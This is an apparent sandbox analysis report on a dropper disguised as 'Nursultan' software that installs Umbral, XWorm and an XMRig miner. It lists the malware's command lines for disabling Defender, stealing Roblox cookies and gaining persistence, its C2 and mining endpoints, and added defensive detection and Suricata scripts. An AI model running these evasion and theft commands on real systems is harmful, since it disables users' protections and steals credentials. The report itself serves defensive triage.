Analysis Overview
SHA256
98d19ece6f9d50124465ab6c1eef845659aada6c62d3e32a2b75b487cf4efdda
Threat Level: Known bad
The file 6850a8c541b310a2f4a5cd88352856a3.bin was found to be: Known bad.
Malicious Activity Summary
Detect Umbral payload
Umbral
Detect Xworm Payload
xmrig
Xworm
XMRig Miner payload
Stops running service(s)
Command and Scripting Interpreter: PowerShell
Creates new service(s)
Drops file in Drivers directory
Reads user/profile data of web browsers
Executes dropped EXE
.NET Reactor protector
UPX packed file
Checks computer location settings
Power Settings
Adds Run key to start application
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
Launches sc.exe
Enumerates physical storage devices
Unsigned PE
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Runs ping.exe
Views/modifies file attributes
Modifies registry class
Detects videocard installed
Scheduled Task/Job: Scheduled Task
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-07-01 02:04
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-01 02:04
Reported
2024-07-01 02:06
Platform
win7-20240508-en
Max time kernel
2s
Max time network
149s
Command Line
Signatures
Detect Umbral payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Umbral
Xworm
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Creates new service(s)
Stops running service(s)
.NET Reactor protector
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Power Settings
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Enumerates physical storage devices
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2164 wrote to memory of 2272 | N/A | C:\Users\Admin\AppData\Local\Temp\87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2164 wrote to memory of 2272 | N/A | C:\Users\Admin\AppData\Local\Temp\87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2164 wrote to memory of 2272 | N/A | C:\Users\Admin\AppData\Local\Temp\87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe
"C:\Users\Admin\AppData\Local\Temp\87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
C:\Windows\system32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe'
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'MSBuild.exe'
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'
C:\Windows\system32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause
C:\Windows\system32\PING.EXE
ping localhost
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\svchost.exe"
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "XMRKNZQC"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "XMRKNZQC" binpath= "C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe" start= "auto"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "XMRKNZQC"
C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe
C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
C:\Windows\system32\svchost.exe
svchost.exe
C:\Windows\system32\taskeng.exe
taskeng.exe {E3AD2D07-DE2F-4A6D-92F1-B00B34649A3A} S-1-5-21-3691908287-3775019229-3534252667-1000:UOTHCPHQ\Admin:Interactive:[1]
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
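The process list above is the useful part of this report: the Defender exclusions, the Set-MpPreference call that turns real-time protection off, the per-minute scheduled task pointing at a svchost.exe in %APPDATA%, the sc.exe service created under C:\ProgramData, the update and eventlog services being stopped, and the powercfg calls that keep the miner awake. The script below is an added triage example written for this page, not sandbox output: it runs a handful of case-insensitive command-line rules over lines copied from the behavioral1 Processes list and tags each hit with an ATT&CK technique. The rule names, regexes and technique mapping are the editor's, not the sandbox's; the same logic applies unchanged to the behavioral2 list.

```python
"""Flag Defender tampering, persistence and miner-install command lines in a
sandbox process list. Added triage example, not sandbox output; the rules and
the ATT&CK technique mapping are the editor's, not the sandbox's."""
import re
from collections import Counter
from dataclasses import dataclass

# Command lines copied from the behavioral1 Processes list above.
SAMPLE_CMDLINES = r"""
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
"wmic.exe" os get Caption
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\svchost.exe"
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\sc.exe create "XMRKNZQC" binpath= "C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe" start= "auto"
C:\Windows\system32\sc.exe stop eventlog
C:\Users\Admin\AppData\Roaming\svchost.exe
""".strip().splitlines()


@dataclass(frozen=True)
class Finding:
    rule: str
    technique: str  # MITRE ATT&CK technique ID (editor's mapping)
    cmdline: str


# (rule name, ATT&CK technique, case-insensitive regex over the command line)
RULES = [
    ("powershell_bypass", "T1059.001", r"-ExecutionPolicy\s+Bypass\b"),
    ("defender_exclusion", "T1562.001", r"Add-MpPreference\b.*-Exclusion(Path|Process|Extension)"),
    ("defender_disable", "T1562.001", r"Set-MpPreference\b.*-Disable\w+\s+\$true"),
    # KB890830 is the Malicious Software Removal Tool; removing it is defence evasion
    ("msrt_removal", "T1562.001", r"wusa(\.exe)?\s+/uninstall\s+/kb:890830\b"),
    ("update_service_stop", "T1562.001", r"\bsc(\.exe)?\s+stop\s+(usosvc|waasmedicsvc|wuauserv|bits|dosvc)\b"),
    ("eventlog_stop", "T1562.002", r"\bsc(\.exe)?\s+stop\s+eventlog\b"),
    ("hidden_system_attrib", "T1564.001", r'attrib(\.exe)?"?\s+(\+[hsr]\s+)+'),
    ("self_delete", "T1070.004", r"\bdel\s+/F\b.*\.exe"),
    ("roblox_cookie_theft", "T1539", r"\.ROBLOSECURITY\b"),
    # task or service whose binary lives in a user-writable directory
    ("schtask_user_path", "T1053.005", r'schtasks(\.exe)?"?\s+/create\b.*/tr\s+"?[^"]*\\AppData\\'),
    ("service_install_programdata", "T1543.003", r'\bsc(\.exe)?\s+create\b.*binpath=\s*"?[^"]*\\ProgramData\\'),
    # svchost.exe only belongs in System32/SysWOW64; this one is the image path of a process under C:\Users
    ("svchost_masquerade", "T1036.005", r'^"?[a-z]:\\users\\.*\\svchost\.exe"?(\s|$)'),
    ("power_sleep_disable", "T1653", r"powercfg(\.exe)?\s+/x\s+-(standby|hibernate)-timeout-(ac|dc)\s+0\b"),
]
COMPILED = [(n, t, re.compile(p, re.IGNORECASE)) for n, t, p in RULES]


def analyze(cmdlines):
    """Return one Finding per (command line, rule) match, in input order."""
    return [Finding(n, t, line) for line in cmdlines for n, t, rx in COMPILED if rx.search(line)]


def summarize(findings):
    """Rule name -> number of command lines that tripped it."""
    return Counter(f.rule for f in findings)


def techniques(findings):
    """Distinct ATT&CK technique IDs observed, sorted."""
    return sorted({f.technique for f in findings})


if __name__ == "__main__":
    found = analyze(SAMPLE_CMDLINES)
    for f in found:
        print(f"{f.rule:28} {f.technique:10} {f.cmdline[:70]}")
    print(f"{len(found)} findings, {len(summarize(found))} rules fired, "
          f"techniques: {', '.join(techniques(found))}")
```

On the lines above every rule fires once except defender_exclusion, which fires twice (the per-file exclusion and the blanket @($env:UserProfile, $env:ProgramData) one). The wmic recon line deliberately trips nothing; inventory commands are noise on their own and only matter in context. Feed the rules any EDR process-creation export with one command line per element instead of SAMPLE_CMDLINES.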
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.137.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | mine.bmpool.org | udp |
| RO | 5.252.178.30:6004 | mine.bmpool.org | tcp |
| US | 8.8.8.8:53 | unknown-sunglasses.gl.at.ply.gg | udp |
| US | 147.185.221.20:28223 | unknown-sunglasses.gl.at.ply.gg | tcp |
| RO | 5.252.178.30:6004 | mine.bmpool.org | tcp |
| RO | 5.252.178.30:6004 | mine.bmpool.org | tcp |
| RO | 5.252.178.30:6004 | mine.bmpool.org | tcp |
| RO | 5.252.178.30:6004 | mine.bmpool.org | tcp |
| RO | 5.252.178.30:6004 | mine.bmpool.org | tcp |
| RO | 5.252.178.30:6004 | mine.bmpool.org | tcp |
| RO | 5.252.178.30:6004 | mine.bmpool.org | tcp |
| RO | 5.252.178.30:6004 | mine.bmpool.org | tcp |
| RO | 5.252.178.30:6004 | mine.bmpool.org | tcp |
| US | 147.185.221.20:28223 | unknown-sunglasses.gl.at.ply.gg | tcp |
| RO | 5.252.178.30:6004 | mine.bmpool.org | tcp |
| RO | 5.252.178.30:6004 | mine.bmpool.org | tcp |
| RO | 5.252.178.30:6004 | mine.bmpool.org | tcp |
| RO | 5.252.178.30:6004 | mine.bmpool.org | tcp |
| RO | 5.252.178.30:6004 | mine.bmpool.org | tcp |
| RO | 5.252.178.30:6004 | mine.bmpool.org | tcp |
| US | 147.185.221.20:28223 | unknown-sunglasses.gl.at.ply.gg | tcp |
| RO | 5.252.178.30:6004 | mine.bmpool.org | tcp |
| RO | 5.252.178.30:6004 | mine.bmpool.org | tcp |
| RO | 5.252.178.30:6004 | mine.bmpool.org | tcp |
| RO | 5.252.178.30:6004 | mine.bmpool.org | tcp |
| RO | 5.252.178.30:6004 | mine.bmpool.org | tcp |
| US | 147.185.221.20:28223 | unknown-sunglasses.gl.at.ply.gg | tcp |
| RO | 5.252.178.30:6004 | mine.bmpool.org | tcp |
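The Network table repeats the same two endpoints dozens of times: 5.252.178.30:6004 (mine.bmpool.org, the XMRig pool) and 147.185.221.20:28223 (a playit.gg tunnel hostname, which is where XWorm calls home). The script below is an added example written for this page, not sandbox output: it parses a copied subset of the table rows, collapses them into unique endpoints with hit counts, separates resolver and CDN traffic from the endpoints worth blocking, and emits Suricata rules for those. The kind/suspicious heuristics, the tunnel suffix list and the placeholder sid range are the editor's choices.

```python
"""Collapse sandbox Network table rows into unique endpoints with hit counts
and emit block rules for the ones that matter. Added triage example, not
sandbox output."""
import re
from collections import Counter
from dataclasses import dataclass

# Header plus a subset of rows copied from the Network table above (behavioral1).
NETWORK_TABLE = """
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.137.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | mine.bmpool.org | udp |
| RO | 5.252.178.30:6004 | mine.bmpool.org | tcp |
| US | 8.8.8.8:53 | unknown-sunglasses.gl.at.ply.gg | udp |
| US | 147.185.221.20:28223 | unknown-sunglasses.gl.at.ply.gg | tcp |
| RO | 5.252.178.30:6004 | mine.bmpool.org | tcp |
| RO | 5.252.178.30:6004 | mine.bmpool.org | tcp |
| US | 147.185.221.20:28223 | unknown-sunglasses.gl.at.ply.gg | tcp |
"""

# Hostname suffixes of public tunnelling services that let a C2 sit behind a
# shared relay IP; *.at.ply.gg belongs to playit.gg. Extend as needed.
TUNNEL_SUFFIXES = (".at.ply.gg",)
WEB_PORTS = {80, 443}

ROW = re.compile(r"^\|\s*(\w\w)\s*\|\s*([\d.]+):(\d+)\s*\|\s*(\S+)\s*\|\s*(tcp|udp)\s*\|$")


@dataclass(frozen=True)
class Endpoint:
    ip: str
    port: int
    proto: str
    domain: str

    @property
    def kind(self) -> str:
        """dns: resolver traffic; web: standard ports; other: anything else."""
        if self.proto == "udp" and self.port == 53:
            return "dns"
        if self.port in WEB_PORTS:
            return "web"
        return "other"

    @property
    def suspicious(self) -> bool:
        # DNS rows only show the resolver, never block those. Non-standard TCP
        # ports (pool, RAT) and tunnel relays are the endpoints to block.
        if self.kind == "dns":
            return False
        return self.kind == "other" or self.domain.endswith(TUNNEL_SUFFIXES)


def parse_rows(table: str) -> list[Endpoint]:
    out = []
    for line in table.strip().splitlines():
        m = ROW.match(line.strip())
        if m:  # header row and anything else that is not a connection is skipped
            _country, ip, port, domain, proto = m.groups()
            out.append(Endpoint(ip, int(port), proto, domain))
    return out


def aggregate(endpoints) -> Counter:
    """Unique endpoint -> number of connections seen."""
    return Counter(endpoints)


def blocklist(counts: Counter) -> list[Endpoint]:
    return sorted((e for e in counts if e.suspicious), key=lambda e: (e.ip, e.port))


def to_suricata(endpoints, base_sid=9000001) -> list[str]:
    # Placeholder sids; pick a range that does not collide with your rule set.
    return [
        f"alert {e.proto} $HOME_NET any -> {e.ip} {e.port} "
        f'(msg:"Nursultan dropper endpoint {e.domain}"; sid:{base_sid + i}; rev:1;)'
        for i, e in enumerate(endpoints)
    ]


if __name__ == "__main__":
    counts = aggregate(parse_rows(NETWORK_TABLE))
    for ep, n in counts.most_common():
        print(f"{n:3}x {ep.kind:5} {ep.ip}:{ep.port}/{ep.proto} {ep.domain}")
    print("\n".join(to_suricata(blocklist(counts))))
```

Run against the full table, the repeat count on 5.252.178.30:6004 is the miner reconnecting for the whole 149 s network window, which is the beaconing pattern to look for in proxy or NetFlow data. The discord.com and ip-api.com rows are left out of the blocklist on purpose: the indicator there is the process making the request (Umbral's webhook exfiltration and external IP lookup), not the destination, so block on host behaviour rather than on a CDN address.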
Files
memory/2164-0-0x000007FEF5193000-0x000007FEF5194000-memory.dmp
memory/2164-1-0x000000013FE50000-0x0000000140150000-memory.dmp
memory/2272-6-0x0000000002D90000-0x0000000002E10000-memory.dmp
memory/2272-8-0x0000000002720000-0x0000000002728000-memory.dmp
memory/2272-7-0x000000001B6A0000-0x000000001B982000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\WBQGIKRMSH1GXMZEJG8S.temp
| MD5 | 171e4596826b2ad10e319469ecb1b8cf |
| SHA1 | 2e423d08e9e4b88dc34f9753b69e86f294f9e28d |
| SHA256 | 811d2032058427b5847c128645a6928932213596163288fd88dcfb05e2fb9438 |
| SHA512 | 474d3efb94f35ed851fc5a9d9c7b94c71dd4371dd4d6980de86d32aec4c6c5d56049787cae365b73d40b7a9e2a3df10992271903e13b23fbc4b4be607d49cd59 |
memory/2632-23-0x0000000001D10000-0x0000000001D18000-memory.dmp
memory/2632-22-0x000000001B690000-0x000000001B972000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
| MD5 | a1d8db2a1ff742bc73dd5617083f5fde |
| SHA1 | 957b182d82efb40a36099dd886ad581977880838 |
| SHA256 | d715e599815190df86069fae7220db64b5999207f77fb6e41cfe318d34c7399a |
| SHA512 | 0c5407f5707e5f2808cf1d85d71815ca67d45edc8bd8a83cc424dc927afcbad6ced5a826fff81549e5684ca0ece039513c3351ce7bf231e37885f7ed04dc513f |
memory/2424-29-0x00000000002F0000-0x0000000000330000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
| MD5 | f0b33cc162bfd36a995b8c90cd8ebff1 |
| SHA1 | ca1ddef08d47fc15a44a2d651b61e3decce8ebc6 |
| SHA256 | 6363305dc75b8bf7aa2a8b31b0b0f38022fb0139f809ecba42e5cfe7530830e0 |
| SHA512 | 1426cd246662adfd9aba4434586dc3bd54d31d395d9fafdcb15e785461a466567bff62e85085c36043cca047f951a96e5fc359c5cbf1000ff3121bba6b2905d0 |
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
| MD5 | c137c5f5287d73a94d55bc18df238303 |
| SHA1 | 95b4b01775bea14feaaa462c98d969eb81696d2c |
| SHA256 | d294856177658df0159cfe937e5ea95a8ee8a2ca85754d897aea3bb5d0d962c0 |
| SHA512 | ba595d185ae98152658ce95964fd6bcce7e970896b0b1c674a142d126cf0433094debcd25527d9b4f5a6568cc5a8a42aeaef536166748eea3973f8b694564aa5 |
memory/1856-47-0x0000000001360000-0x0000000001548000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
| MD5 | 0df0a039309525fd27e1b5e056c92b6a |
| SHA1 | 7551c27a9123cb56c4218647966a753794ac2961 |
| SHA256 | a29379238f93fa6301dd390e635b0c1f53d9197c68adc0f00cbc52bb4311a23f |
| SHA512 | 2c00ea216368e254167bd5f2562cbc93953b9c4756765f4504aaae7e9dc45e5584fef1ddb174b651a9a090c7217424e5b80dec58f6f2493c54704f46c35fede6 |
memory/1880-61-0x0000000000400000-0x0000000000412000-memory.dmp
memory/1880-60-0x0000000000400000-0x0000000000412000-memory.dmp
memory/1880-59-0x0000000000400000-0x0000000000412000-memory.dmp
memory/1880-58-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp
memory/1880-56-0x0000000000400000-0x0000000000412000-memory.dmp
